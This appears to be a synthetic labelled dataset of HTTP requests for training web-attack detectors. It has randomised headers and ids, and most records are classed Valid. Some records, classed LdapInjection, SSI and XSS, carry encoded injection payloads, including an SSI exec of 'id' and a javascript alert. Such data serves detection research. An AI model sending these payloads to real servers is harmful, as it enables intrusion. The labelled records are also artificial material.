If-Range: *
Max-Forwards: 6
MIME-Version: 4.8
Pragma: tiyrnu='ee8cq'
Proxy-Authorization: NTLM UGFBdGk4c3ZhNWk0b290ZXRodGVvb2N0UzFtT2lveXJvc2Ru
Authorization: Enne e6ota=ceehpe
Range: 10-894039
Referer: /svd4R/st6dsR.cfm
TE: trailers
Trailer: Authorization
User-Agent: ljAv@5u3 http://www.woIse.net
UA-CPU: PowerPC
UA-Disp: 742,2997,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9422x259
Via: ase/4.8 www.0pEu.html
Transfer-Encoding: aglu
Upgrade: T7eg/6.6
Warning: 146 www.lsdhDul.jpeg "nnetelfllaw8" 
X-Forwarded-For: 20.38.1.164
X-Serial-Number: 97437776345
----: ---------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45811
Start - Id: 38181
class: LdapInjection
GET /tv_ziuBanmRql.U68O/eXkyhutl-ZOqiqT@6W/uSNVgti/n1qtuyobMesT/nph-0/nMj5mL8RCdX7J/t1cls@K5/i-5X-o/lqf/2EirX3qDEidAgp/qWlItC.bin?s3hoe=ifsp%29%28%26%28objectClass++%3D+++ay*%29 HTTP/1.1
Host: www.ameonlopio.com
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: nrfnu-uooytv
Cache-Control: min-fresh=80615
Client-ip: 238.249.58.159
Cookie: Iuvbaewn=/ton62ecfonege];jp4.d=oev8X;gnhnlvmnRdonea=i?xterm
Cookie2: $Version="22"
Date: Sat, 17 Jan 04 09:03:30 GMT
ETag: W/"cvMbx4sfux4.USQJj"
Expect: ni4g=eota
From: nethi@otsenrjp.biz
If-Modified-Since: Wed, 07 May 08 01:40:19 GMT
If-Unmodified-Since: Thu, 14 Jun 07 18:11:24 UTC
If-Match: *
If-None-Match: *
If-Range: "qqk1eSLudV2R98BwYA"
Max-Forwards: 7
MIME-Version: 3.1
Pragma: EsRS1m=dT7u5i8c
Proxy-Authorization: Basic dGlvbDp6c2xibmU=
Authorization: Basic b3JucTpiUkV2ZTduZA==
Range: -49,281-
Referer: /rECer5/2isgTe/ilAi6D/tcnagma/a8fHe.sh
TE: gzip
Trailer: Via
User-Agent: crreierrb/2.9
UA-CPU: PowerPC
UA-Disp: 747,821,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5505x7135
Via: HTTP/4.9 www.ntt4eA.jpg:06
Transfer-Encoding: compress
Upgrade: rho/1.8, riptm/6.0
Warning: 995 www.tstihc.htm "sL1halusfi" 
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 276586158043
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 38181
Start - Id: 7432
class: Valid
POST /iiLYfNLk22Z43/e8wL-_/lnoehlNeftahgi/s9g/yatilumiyI/hSUqTnj-Ax9F-S.mspx? HTTP/1.0
Content-Length: 100
Content-Language: hgs,i
Content-Encoding: gzip
Content-Location: /Kamhps/aCmtl8R.asmx
Content-MD5: NHRlbHR4ZW1uNWFSYWVSNA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 01 Jun 04 04:38:55 UTC
Last-Modified: Sun, 05 Nov 06 06:14:42 UTC
Host: 103.26.54.212
Connection: close
Accept: */*;q=0.5
Accept-Charset: iso-2022-jp;q=0.3, x-mac-arabic;q=0.8
Accept-Encoding: *
Accept-Language: 8e8aT-dbsth3oq;q=0.5, disVYad-epqo5iv;q=0.8, ids-R7;q=0.3, tt-izN;q=0.3
Cache-Control: max-age=1
Client-ip: 88.207.186.172
Cookie: eeEayhc0=tperlselect;tHdsoTccinx=lmahn;doitrr=ugn4copy
Cookie2: $Version="94"
Date: Thu, 27 Oct 05 15:22:10 UTC
ETag: "6vz7sTtTkVMjnt6z"
Expect: 100-continue
From: etjre@ngegAdwy.net
If-Modified-Since: Sat, 15 Sep 07 24:30:34 GMT
If-Unmodified-Since: Tue, 24 Feb 09 13:40:00 CET
If-Match: "c_a3XpOyvViMivE1fh"
If-None-Match: "DKaSgNw0k_BGtb_S"
If-Range: "6P2WFMlsFKCM.icm"
Max-Forwards: 3
MIME-Version: 0.7
Pragma: Sdoxa=tNren
Proxy-Authorization: NTLM bmU4RW9kd2dobnNtaXJ0YWNub2dyOW55cm1lUE5kdTFmd2dhbGVIMHZpdDA=
Authorization: Basic bnJpbGk5eWU6c2VpYWVXdEE=
Range: 1-587,1-,-06
Referer: http://www.nmn1.ch/e2teem.mp3
TE: chunked,trailers
Trailer: Transfer-Encoding
User-Agent: h5tKBhe http://www.8hi3.cz
UA-CPU: MIPS
UA-Disp: 634,725,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2293x2568
Via: 7.7 154.248.57.235, FTP/7.2 132.16.236.249
Transfer-Encoding: eedhr; esZmhhhe=4erlos
Upgrade: aais5e/5.3, eke/9.2, tigCl/6.9
Warning: 865 www.fNat6e.html "Easpea4" 
X-Forwarded-For: 208.252.109.22
X-Serial-Number: 51648085743746
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

e8=577&fEftpmf=mIREBOlv&vstsnmeBiarb=0109413104&eiit5i4aNab1sru=4 ho&jebMTdt1la8e=nohaedt6oeaainesiw

End - Id: 7432
Start - Id: 15885
class: Valid
GET /a_bvTj.VaZeY-qpzj/njHadx3D/xstersosftwrl/2h_FfU/a6JUDXhOdpWT.exe?lUPgo=-eprocessing-instruction&mxop6zrdc9nc=es%3F&Tznea=93244026&hMhdow=lbQksUQM&dlxueetEIet=ite7Uedy&heavmeei=5324188&VAls-5OI1aI=32&wbaecchikesRde=1923148&7As6C5crbe7efor=72 HTTP/1.1
Host: www.uh4r6Onf.fr
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 197.55.8.188
Cookie: laueryeni=imgncwnlahttpsm&;ir5e2aasmrjaOz=ss4e;i719t=teval2imjlhr%gzn8d;elaste=ee;rrota=7861
Cookie2: $Version="34"
Date: Sat, 09 Oct 04 11:00:10 GMT
ETag: W/"zNM1sZ70pkYR7sUn"
Expect: tUOnsd=jes6ndZs;Iihhnrle
From: ks2tnwg@hnreg9rhrn.biz
If-Modified-Since: Tue, 05 Sep 06 23:13:11 UTC
If-Unmodified-Since: Fri, 13 Jul 07 11:13:21 UTC
If-Match: *
If-None-Match: "qmgo6DJL9ZbDJnIYdX"
If-Range: Thu, 30 Aug 07 11:37:17 UTC
Max-Forwards: 4558
MIME-Version: 8.0
Pragma: nzx2=fra3xa
Proxy-Authorization: Digest opaque="lhniHtaa"
Authorization: nRmvw i9Orf9sr=mnaneme
Range: 141-7620
Referer: /sednthe5/alrscLN/9Xin4.pl
TE: deflate;q=0.9
Trailer: Host
User-Agent: Mozilla/7.6 (Windows; U; WinNT 8.6; pe-o8; rv:8.7.9) Gecko/48482734
UA-CPU: MIPS
UA-Disp: 318,100,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 664x941
Via: HTTP/4.2 179.94.157.232, FTP/6.4 www.higsmwth.jpg:2
Transfer-Encoding: identity
Upgrade: 5hn4s/0.4, tec/5.7, ry4ia/5.2, 6ik/3.4
Warning: 350 131.15.21.242 "Sel0th" "Sun, 27 Jul 08 18:49:35 CET"
X-Forwarded-For: 188.189.177.85
X-Serial-Number: 828350
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 15885
Start - Id: 40078
class: SSI
GET /seGH/usiWnn9eshmis3d/eoftdiizkdthradsmr/aY1wq/t7OFvIwL1eb0T0nZ1U2T/onsiscaeri1dQ/MjSh7DxETK/o6Ua/rQe/9E.nsf?suideal=iyhasie+lts&aeoy5s=atec&a4euTis=7098671&teh=copya&vHecho51copyn=4i&Omais0n5orutiai=sa&mqjmisbqs=to+A2zrb3e8mjc&eHAOV1EVcy=vwfunionSD1t+rp%3Be+%27&tmsk=a91%27s&srtttmtn=jIZ1nDOWi9&qpKy=e&eoe=5&raloit0=imithehleHicdnat&eej=sf0dEPk&DIjXLivn4Tkiframe=%3C%21+++%23%3C%21--++++%23exec+cmd%3D%22id%22--%3E HTTP/1.0
Host: 78.12.122.84
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 53.190.46.19
Cookie: eiA=43;LAguYcBQ9Yib=4967007
Cookie2: $Version="642"
Date: Wed, 20 Apr 05 08:46:35 GMT
ETag: "zpw2OwFuO-yaWgtlF9eB"
Expect: fpetd
From: hbdwf2hh@oEzag3e7.de
If-Modified-Since: Thu, 11 Feb 10 08:25:09 UTC
If-Unmodified-Since: Sun, 19 Dec 04 11:02:49 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 21 Nov 04 11:37:57 UTC
Max-Forwards: 5
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: tk5tph hFlgrdtC=taleir4
Authorization: Digest nc=7AfFe9A4
Range: 4-,3-,-4
Referer: http://www.uxeo8n.uk/IMdyhsf/nNtIhg.cfm
TE: trailers,trailers,deflate;q=0.7
Trailer: Transfer-Encoding
User-Agent: heui23/2.7.3.2
UA-CPU: PowerPC
UA-Disp: 097,3565,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 893x680
Via: 5.6 22.105.75.198, HTTP/8.3 178.233.163.162, i0ti/5.2 65.50.237.6
Transfer-Encoding: Redce
Upgrade: uts3/8.2, hd4uvh/2.4, a6sol/2.3, yce/9.7, cnsH/1.9
Warning: 187 www.s2nfht.shtml "Idhcekl" 
X-Forwarded-For: 133.223.4.65
X-Serial-Number: 9018401167222078
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40078
Start - Id: 23331
class: Valid
GET /xGmqGDwv/1IH4a6U9UE/lJB.yEsEx/8pI/lsdfurauibeuae/eiasttrreenl/earWY@0nqCx8/bHrvuMLD0ufGrs5b3/dCCuPaYu/6Y0I5pwRqEJojXFOA.gif?UAHPcUr=s81+2snsgroup+by&mh4o=eahmesmo&dnd65ndm=++erar5cctaloeperle9e&bxGBRU=lti%25e%7C&daaqGlifspawmrs=Ae-oobjectnze%241&uibdwefxD3art=3&wnpgcGimxEok=5483081&atioo=782589633 HTTP/1.0
Host: www.ghAh.be
Connection: keep-alive
Accept: text/plain, audio/*
Accept-Charset: x-mac-greek;q=0.6, windows-1252, x-mac-hebrew
Accept-Encoding: *
Accept-Language: f0s-ReZNc0;q=0.9, te-yrWowt;q=0.4, rwlysnc-n
Cache-Control: max-stale
Client-ip: 87.140.193.18
Cookie: eHyaoEa1hhtt=5980;eNsteW=988794;xb.Tl8nPwindow.opendp=@d;Braopby=6733642
Cookie2: $Version="114"
Date: Sat, 27 Oct 07 03:48:09 GMT
ETag: W/"ynrqS@txFebq1J5v8"
Expect: 100-continue
From: 2lbei@tdeem.org
If-Modified-Since: Thu, 15 May 08 19:19:00 GMT
If-Unmodified-Since: Wed, 30 Jul 08 18:38:39 CET
If-Match: "qEXNYx.I8ONnfaF"
If-None-Match: *
If-Range: "i7TQvnTlR0q9BZ6pl"
Max-Forwards: 64
MIME-Version: 3.5
Pragma: e=ot
Proxy-Authorization: Basic OW9lVHQ5OkNXOW9wcjZv
Authorization: Digest response="233d771dA1aa85c22883aEfAFc4Bb6E5"
Range: 56641-,-4,2-
Referer: /nxeaAN/nrasdn/7zdYcygd/si3mrutc.pl
TE: chunked
Trailer: Warning
User-Agent: wasewaX
UA-CPU: Sparc
UA-Disp: 295,003,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 229x4077
Via: 0.1 68.222.62.88:4
Transfer-Encoding: compress
Upgrade: djbm1/8.1, yti/6.3, troL/1.6, aze4re/4.7
Warning: 614 www.eyqtEs.shtml "o4SsAiadTpu" "Mon, 26 Jul 04 10:18:10 GMT"
X-Forwarded-For: 18.255.56.221
X-Serial-Number: 22361064185048
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23331
Start - Id: 47983
class: XSS
GET /gwpgc9Lhq/n2/cilxR/xp_bXwqId2V0dzc/6nnlylffav/titeeAs.tiff?Ixfi=tden%3D5sObodyn&mtLts2rf=c9&coebuycso=2432255&oacmie=95048&npilniiEoeqs=76516882&sv=fwuedobueei&8atjgltr=%3Cobject+classid++%3D+%22+++++clsid%3A...%22++codebase%3D++%22++++javascript%3A++%5Balert++++%28%27nvm%27%29%3B%5D+++%22++++%3E&aooueiuTp4hyo=9112747&lnknnosntdovgTd=estlnhEl9c&eddoibfoa=3301&z0tcssambe@U=87116 HTTP/1.0
Host: www.tlasc.st:54
Connection: close
Accept: */*
Accept-Charset: iso-8859-8, gb2312, euc-tw
Accept-Encoding: *
Accept-Language: tiU-mexjvkta, m-i;q=0.0
Cache-Control: max-stale
Client-ip: 200.176.81.45
Cookie: id6hre1Nsx=i9;oc3aR=soetorthkcnEg;bbgsoundPwinntmQobjectayu=4
Cookie2: $Version="140"
Date: Wed, 12 Jan 05 06:35:10 GMT
ETag: W/".PIa5x900H8gqvCc"
Expect: lFikdnif=fhohwa1
From: n25cwrN@ae4ttib.uk
If-Modified-Since: Wed, 14 Jun 06 09:51:48 GMT
If-Unmodified-Since: Thu, 05 Oct 06 16:49:40 CET
If-Match: "Cg2Dd7zlxDIcF_7Vrjo"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 8.2
Pragma: 3EtsTeto=nediHeN3
Proxy-Authorization: Digest nc=b2c271ed
Authorization: Basic RGRldWVhOmRzek45
Range: 147-9,-924229,1-59450
Referer: /honev0tr.ace
TE: chunked;q=0.8,deflate;q=0.2
Trailer: User-Agent
User-Agent: Mozilla/8.2 (X11; U; Linux i586 8.3; le-at; rv:5.3.8) Gecko/08110914
UA-CPU: 68000
UA-Disp: 719,994,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 480x167
Via: 2.0 96.103.10.196, HTTP/7.7 194.94.15.215, FTP/9.1 31.201.81.96
Transfer-Encoding: gzip
Upgrade: ncS/0.9, oneft/1.4, g2ddat/1.2, wrNtr/6.4, r7ss/7.4
Warning: 549 www.7tn2ri.jpg "cr4ayetrlreo6ceei3r" 
X-Forwarded-For: 23.144.158.109
X-Serial-Number: 41529
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47983
Start - Id: 13613
class: Valid
GET /9ebYphcdx47uatsco/eyPaRibbslicn/tbBElWRdATU0d@teppd/fQIpPF/4bFpSFTEvZOFWkZ@/zhfX/ugOxL/Xvei6oaoiasot/nlcnlsko1ahtuo/rnpwvJU-RkjoVoy/k7ioaweE7.php?trika=nAbx7 HTTP/1.0
Host: www.8lnRT.gov
Connection: close
Accept: text/html, application/*;q=0.5, image/jpeg
Accept-Charset: iso-2022-jp;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: ortfsfa='ricHt'
Client-ip: 219.134.133.127
Cookie: ds=nezw6iey ;ryEMhikan=j9rrlovnaBhphpnr2
Cookie2: $Version="796"
Date: Sun, 13 Apr 08 11:40:44 UTC
ETag: "y_edEifPYWE54zi-v"
Expect: tooesns=Nhma9rr
From: hwaei@ybC13e6.ch
If-Modified-Since: Fri, 13 Feb 04 21:08:12 UTC
If-Unmodified-Since: Sun, 16 May 04 21:55:23 UTC
If-Match: "ugtVk1tmoD3VdcPiYox"
If-None-Match: "F6jYmY43fPdawnDppn"
If-Range: *
Max-Forwards: 171
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: NTLM bWVpNmFhc282ZGRzckh3bUl0dzhoNnJlaW83V2ZDb3RyU25z
Authorization: Basic REhhZXk6aHNyMWllcw==
Range: 8-93898,-3983,-5248
Referer: /te5swm/phsz/i0feez.js
TE: chunked;q=0.2
Trailer: From
User-Agent: sEtode (k1xBotf)
UA-CPU: PowerPC
UA-Disp: 087,2562,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1926x6601
Via: HTTP/1.4 22.74.241.12
Transfer-Encoding: hsIqtv; eganan=Zrobtry
Upgrade: ksola/7.8, haEuhh/9.9, nrh/5.2, Dl0m/5.1
Warning: 667 193.214.100.224:730 "rhuswliziie6a" "Sat, 17 Apr 04 22:29:46 CET"
X-Forwarded-For: 48.26.121.103
X-Serial-Number: 5747927259472661
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13613
Start - Id: 27435
class: Valid
GET /trpdaelo5/tsxFhC_e9XrW_h1ldS/rlyYrC/tkxsahhstNfsnbaha/dzBTrS__/chEP6/95hhneoror2reat/iJE4p8/sfdgefci/moa/owen44xoge0rmbeInho/oIttrau.swf?xt6=likespe&retaecaam=hrpilexHiYn8&zaiiehoee=Mndieteivaiu&EA3RU740SW-=101904 HTTP/1.0
Host: 205.155.191.77
Connection: keep-alive
Accept: image/jpeg
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 54.17.98.207
Cookie: EaeciulaaEs=hrsdiv
Cookie2: $Version="49"
Date: Wed, 20 Jul 05 01:31:11 GMT
ETag: "TxkeDqa15iDuNrb0yk"
Expect: 7rml
From: mkpuh@Norr.org
If-Modified-Since: Thu, 13 Dec 07 20:24:47 UTC
If-Unmodified-Since: Tue, 20 May 08 16:54:49 UTC
If-Match: "-TRadkaDyNQibc-"
If-None-Match: "h-jhpZ1flJsVwIWgg4"
If-Range: "CoQO73.zgjsGKZvSfz"
Max-Forwards: 799
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic ZXJmbW9zOjdyeWg=
Authorization: NTLM MWJkZHRxbHN4bmVlZW5lb2VoZG5ocnB5dW5wanphb2R0ckVveWN0c3Q=
Range: 72-
Referer: http://www.0WhfPtfa.ch/tTer/dsle/lIeime.pdf
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/9.4 (X11; U; Unix 2.4; Om-w1; rv:1.0.0) Gecko/79428384
UA-CPU: MIPS
UA-Disp: 2797,148,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 759x1141
Via: 9.6 www.da5ssplw.jpeg:09
Transfer-Encoding: gzip
Upgrade: aof/7.7, e9Azie/5.3, isosn/8.8
Warning: 822 www.aJHeb.gif "Ee3Jmyqt1htasneg" 
X-Forwarded-For: 109.233.98.137
X-Serial-Number: 29844122
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27435
Start - Id: 40074
class: SSI
GET /xd1xp_@P/emd8x_W7e4VfSI/mxNzQmvI/ebh4awrFda0yoen9Ay/q5iimfldCalsthaesn/deceaisteawgbeN/3TNgX./mnl1Idnluup1/e-D@M3At6e/niXj.5IM3Y/nrhh/hwnfcjNmdo.pl?e6an=%3C%21++++%23%3C%21--%23exec+++++cmd%3D%22id%22--%3E&tgdea07aan=locationa1raVu+dmU&wlhrgdx=vzEgM&orc=0712044&qLybTrO.ky=gioihEiuhbz&xlaEiBpmr=31138849&i6=rdue%3Bt%5Bsecho%2F&jess=Ntlctt%3E&qodem=divofo-&qxHfic14x=samesampi&voiU=dK66r6PoObA&etcEou2=%5Cb&soPYeogn=+ha%3Dlocationddelete1gessf&pcelIs=00261 HTTP/1.0
Host: 137.134.62.184:80
Connection: close
Accept: */*;q=0.3
Accept-Charset: x-mac-korean;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 53.190.46.19
Cookie: 1fgdM9c=5316464392;3tssitedeiI=etiziprocessing-instructionkdsrfoc;31=6945;atzj=srKEdqwlfWMd;0Ipnodop=8
Cookie2: $Version="641"
Date: Fri, 19 Mar 04 13:50:29 UTC
ETag: "6MLClxhRoy2z2nIcv"
Expect: fpetd
From: uohepreO@9Mntu.biz
If-Modified-Since: Sun, 03 Oct 04 01:05:25 CET
If-Unmodified-Since: Sun, 19 Dec 04 11:02:49 GMT
If-Match: "U_svl4CupDxkcwN"
If-None-Match: *
If-Range: Sun, 21 Nov 04 11:37:57 UTC
Max-Forwards: 972
MIME-Version: 7.5
Pragma: natSlh='at'
Proxy-Authorization: tk5tph hFlgrdtC=taleir4
Authorization: ySmbtg TeJeygnt=rlromq
Range: 4-,3-,-4
Referer: /x0oepom/nesatnr/sa2er.tiff
TE: trailers,trailers,deflate;q=0.7
Trailer: Authorization
User-Agent: 7dcdiootau (o4xyMa; oNTJL6; 7C_-5gG; mj79xKf; b9XBWaG)
UA-CPU: PowerPC
UA-Disp: 097,3565,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 893x680
Via: 5.6 22.105.75.198, HTTP/8.3 178.233.163.162, i0ti/5.2 65.50.237.6
Transfer-Encoding: deflate
Upgrade: rcieEo/9.2, esrs/5.8, kEi6/4.8
Warning: 187 www.s2nfht.shtml "Idhcekl" 
X-Forwarded-For: 149.177.156.143
X-Serial-Number: 44488715
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40074
Start - Id: 8974
class: Valid
GET /o-spzTirt@5/aw4sioTotInuo/2ee1tcmawxdfk5gktrt/0pEXcopyzShpassthruPT/ba/iVczKH3HR40xRIrs1/oJ2eaeSRRQLTo8/CfgdfZfpasswdz/mailopenallY1UD@40/kaphtqnah.exe?z1r=csveeah&ql1ZeVpNgb-=cnnre9mtctcwroh&gdpgonwsF=e8uiniy&taedmmtir=afsarniinrJaairgn&eyaino8reT=8886143&tidennvtyebrs=0&esgotal=196120&AKcLa_j04HeQ=tiunb&wni9t0aa=t.bOJwMvPuY HTTP/1.1
Host: www.qmpfb.st
Connection: Eyteits
Accept: text/*;q=0.3, text/*
Accept-Charset: *;q=0.1
Accept-Encoding: compress, gzip
Accept-Language: c-ie1ooeW;q=0.1
Cache-Control: only-if-cached
Client-ip: 114.255.87.56
Cookie: e9trnekjcpbo=tG9;gieh3doa=42;ai=iezt1:iatoEh =+ht5o;uTicy=9168871;iYeaxxsofNason=3211010971;5nuneaddprA=malzaept
Cookie2: $Version="654"
Date: Tue, 02 Jun 09 15:47:48 GMT
ETag: W/"iiIYTb6w_2VPGKsp8fe"
Expect: 2dns
From: etedlri@oanesz.de
If-Modified-Since: Wed, 12 Dec 07 19:47:41 UTC
If-Unmodified-Since: Thu, 17 Jan 08 10:18:46 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 15 May 06 14:02:22 UTC
Max-Forwards: 783
MIME-Version: 7.6
Pragma: ftEls='vekiar6'
Proxy-Authorization: tNnw Thot=heMot0um
Authorization: NTLM dHJFdERuN3NzTWtkSWhyZW5mcHdvYWNyZ2x0SWhldGVsanRObGxhdm8=
Range: 698556-9033
Referer: /uts5ih/wmaft/diru/sisidsh.jsp
TE: trailers
Trailer: Trailer
User-Agent: tses3yfnsraoeitlme2
UA-CPU: PowerPC
UA-Disp: 7331,790,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 7350x9086
Via: hanec/6.8 6.103.141.83:703, 8.1 13.88.207.26
Transfer-Encoding: identity
Upgrade: dRre6/9.2, ntj/6.7, Fwu/3.4, rm5wer/2.6, 4eaei/3.5
Warning: 247 www.nekn6rAe.htm "a78cpakr" "Tue, 30 Jan 07 10:22:39 CET"
X-Forwarded-For: 219.111.245.62
X-Serial-Number: 92954758156
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8974
Start - Id: 32526
class: Valid
GET /sefRs/Btwsf4iIe/bIK-1d/eawDoi2fsseovhbess.msf?euTollst8lgAlr=telnet8a&Grinrorplr=9_4JkiBcQ&etiItt9Zsteied=462&@5_XBVRvZ=RxNe&it6hqtwo=rtmmtt4Rzih&iuunimiht0=nfs&su=1248&sowr=uodseoxdH&eataklcsstdit=3&msmytenfiorsgo=Moeou&V9UzVvWN=rfgnmecld HTTP/1.0
Host: www.n8e0.uk
Connection: 7Cqmch
Accept: image/gif;q=0.0, image/gif;q=0.9, video/mpeg
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 228.189.193.35
Cookie: y3gDte=si2u8It;lJse1jkernT=o6lKyl;hqo=ta v;ooehad6tsTtr=atpL4sNg.TY;E8f3DzBfZyS=zs>o
Cookie2: $Version="7"
Date: Sun, 26 Mar 06 19:23:30 UTC
ETag: "LfNuYLG2OwPS_a@hHk"
Expect: iql39sh=teat;sAssne=tu7Estt
From: nhjpm@hssbaexotE.be
If-Modified-Since: Thu, 04 Feb 10 06:34:29 UTC
If-Unmodified-Since: Tue, 07 Apr 09 24:44:39 GMT
If-Match: "Jv@Gm5LkixIhmE5"
If-None-Match: *
If-Range: Sun, 23 Dec 07 09:02:18 CET
Max-Forwards: 463
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: NTLM aXl0bjZjYmRtYWZtMWpvaDRhdmFlY3VxZ2xlZHU3cmVoYUVrbmF0OXJybw==
Authorization: NTLM bnByZGFodHBvdDJ3Y2U0ZWlyb2hteWE2bHNydG9HYnR0ZW1pbUlwZWV0dGh2cw==
Range: 49335-07309,-330564
Referer: /epitAeo/eiQn/iolpza9u/ymls7ws.php
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/8.3 (compatible; 4nsDRreteo; Open BSD i586; Hiet; nnDjtens; d4dnl)
UA-CPU: PowerPC
UA-Disp: 7495,590,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 5706x229
Via: 0.0 www.7eeaili.html:4379, 5.6 142.201.42.99:451
Transfer-Encoding: iepk; ovir=zadnsn9e
Upgrade: ajrIgd/6.3, orleV/5.0
Warning: 566 156.56.89.148 "sut8h0hceiiu" 
X-Forwarded-For: 10.109.104.13
X-Serial-Number: 511215738
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32526
Start - Id: 34629
class: Valid
PUT /nkL40cJ8/fRJ/systemrSoptIounionXG0Fao/ikRdde/1mVqY/ktEo/sinecpckeaideP/tieULanketaau/ana.dll? HTTP/1.0
Content-Length: 296
Content-Language: n4En
Content-Encoding: gzip
Content-Location: /reee/ei1hinp2.jpeg
Content-MD5: RWhqYXRscGFqbHNmaW5haQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 16 Dec 07 17:43:56 CET
Last-Modified: Fri, 22 Aug 08 12:48:17 CET
Host: 210.84.114.16:26
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: identity;q=0.4, identity;q=0.1, identity;q=0.6, deflate
Accept-Language: k-spgaGt;q=0.9, wio4mOv-liwrryjO, ep0tyat-dhs
Cache-Control: only-if-cached
Client-ip: 152.143.90.47
Cookie: he1o=7liw
Cookie2: $Version="62"
Date: Tue, 08 Feb 05 13:24:07 UTC
ETag: "KRbEqcWo7niUBVKM"
Expect: 100-continue
From: ebe2@s8zmeu.com
If-Modified-Since: Mon, 20 Mar 06 21:58:42 CET
If-Unmodified-Since: Fri, 21 Sep 07 20:55:44 CET
If-Match: "lI@gwzl_Ac.-rS2"
If-None-Match: "yz7@M7nXQ8pWGjtkNO2i"
If-Range: Tue, 08 May 07 07:43:33 GMT
Max-Forwards: 9
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.x4ihPxh.ch/M14aso.sh
Authorization: uNten rltperjs=fhfhsd
Range: -64
Referer: /ha5JhsU.jpeg
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: Mozilla/5.3 (X11; U; Linux i586 6.8; 47-nn; rv:5.2.3) Gecko/10314740
UA-CPU: PowerPC
UA-Disp: 743,4010,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3397x406
Via: 6.7 122.115.118.60:84692
Transfer-Encoding: compress
Upgrade: udftat/1.5, tofti2/8.0, cbCoi/4.0, dnsten/6.9
Warning: 126 184.254.8.94 "hs6kDqgohf9xOu6Aoai" 
X-Forwarded-For: 139.243.218.142
X-Serial-Number: 09613
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ijiejp0a=kotet&ctqgs=slon?hy/asoz&Iu=clis+r a&li5efse=Eo scOm accept@&weeA4neeempeOp=gdpmseietyeac&raa=as4 y8 D[%&9eelsF=ooiimatperl%ot(I0\&6cso8amQa5o=3uvprmetboa&Rn-5I7m=i9skbh5&ehTt1=2eluaG&sspl2x=oh|=&arnwanm=ib9$rDetcp-scriptdiv&eicse=Papi&estnt1Eneu=n65eArThpdeeerte

End - Id: 34629
Start - Id: 7851
class: Valid
POST /h@U6lperlBp5lNIL/eNPjFMW8ZyA9UrO.png? HTTP/1.0
Content-Length: 273
Content-Language: nqcg4so,uzAe,rc
Content-Encoding: compress
Content-Location: http://www.mucnorp0.ch/Trosdt/isrzetoe/u6httr/tty3aas.tiff
Content-MD5: ZGVpd2JlOERpdDRzZUluYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 21 Apr 09 07:01:43 UTC
Last-Modified: Mon, 09 Jul 07 14:56:22 GMT
Host: www.eiepetdnee.com:8633
Connection: close
Accept: */*;q=0.1
Accept-Charset: us-ascii;q=0.1, x-mac-arabic, iso-2022-kr;q=0.8, iso-8859-6
Accept-Encoding: 
Accept-Language: t2nt-9Etiesx;q=0.5, Vqmeoah-il;q=0.6
Cache-Control: only-if-cached
Client-ip: 152.17.44.239
Cookie: RQ=8605802
Cookie2: $Version="962"
Date: Sat, 05 Dec 09 12:21:39 GMT
